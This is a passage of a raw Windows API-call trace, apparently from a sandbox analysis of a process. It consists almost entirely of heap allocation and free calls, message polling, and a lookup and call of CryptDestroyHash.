hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.812] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0117.813] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0117.813] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.813] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0117.813] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0117.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0117.814] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0117.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0117.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.816] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0117.817] CryptDestroyHash (hHash=0x41ac540) returned 1 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.819] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 